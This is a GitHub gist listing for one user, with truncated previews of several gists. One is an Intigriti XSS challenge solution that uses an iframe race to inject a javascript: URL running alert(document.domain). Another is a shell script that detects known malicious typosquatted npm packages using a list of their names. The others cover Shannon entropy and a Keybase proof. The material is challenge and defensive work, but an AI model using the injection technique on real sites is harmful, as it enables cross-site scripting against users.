radekk
@radekk
radekk / rc.html
Created November 25, 2019 11:33
Intigriti XSS challenge solution 11.2019 - Race Condition
<html>
<body>
<iframe id="ifr"></iframe>
<script>
var ifr = document.getElementById('ifr');
ifr.src = 'https://challenge.intigriti.io/#https://intigriti.io';
ifr.onload = () => {
  setTimeout(() => {
    ifr.src = 'https://challenge.intigriti.io/#javascript:alert(document.domain)';
radekk / detect.malicious.npm.sh
Last active April 27, 2020 04:43
Detect malicious npm packages published by ~hacktask account
#!/bin/bash
# Author: @radekk
# List of vulnerable packages is from https://twitter.com/iamakulov/status/892485192883073024
# ----------------------
_IFS=$IFS
_COUNTER=0
_COUNTER_ALL=0
_SCAN_PATH=${1:-~/}
_VULN_PACKAGES="babelcli crossenv cross-env.js d3.js fabric-js ffmepg gruntcli http-proxy.js jquery.js mariadb mongose mssql.js mssql-node mysqljs nodecaffe nodefabric node-fabric nodeffmpeg nodemailer-js nodemailer.js nodemssql node-opencv node-opensl node-openssl noderequest nodesass nodesqlite node-sqlite node-tkinter opencv.js openssl.js proxy.js shadowsock smb sqlite.js sqliter sqlserver tkinter"
_REGEXP="(babelcli|crossenv|cross-env\.js|d3\.js|fabric-js|ffmepg|gruntcli|http-proxy\.js|jquery\.js|mariadb|mongose|mssql\.js|nodecaffe|nodefabric|node-fabric|nodeffmpeg|nodemailer-js|nodemailer\.js|nodemssql|node-opencv|node-opensl|node-openssl|noderequest|nodesass|nodesqlite|node-sqlite|node-tkinter|opencv\.js|openssl\.js|proxy\.js|shadowsock|smb|sqlite\.js|sqliter|sqlserver|tkinter)"
radekk / entropy.js
Created June 7, 2017 18:16
Calculating Shannon's entropy with JavaScript
/**
 * Calculate Shannon's entropy for a string
 */
module.exports = (str) => {
  const set = {};
  str.split('').forEach(
    c => (set[c] ? set[c]++ : (set[c] = 1))
  );
radekk / entropy.table.txt
Created June 7, 2017 17:50
Shannon's entropy for sample strings
╔════════════════════════════════════════════╦═════════╗
║ String                                     ║ Entropy ║
╠════════════════════════════════════════════╬═════════╣
║ john.doe+test@example.com                  ║ 3.8937  ║
║ https://auth0.com/this-is-test-url-4575812 ║ 4.2728  ║
║ THIS_IS_NOT_A_SECRET_ONLY_A_PROPERTY_KEY   ║ 3.6464  ║
║ /etc/init.d/rc4/script.sh                  ║ 3.5133  ║
║ button[value="test1337"]                   ║ 3.9183  ║
╚════════════════════════════════════════════╩═════════╝
radekk / keybase.md
Last active November 16, 2017 15:21

Keybase proof

I hereby claim:

  • I am radekk on github.
  • I am radekk (https://keybase.io/radekk) on keybase.
  • I have a public key ASDTZzfkj8mjeJ6ZLTm-fWU9dLhJY2EpTMjShIcw9Cjz-go

To claim this, I am signing this object: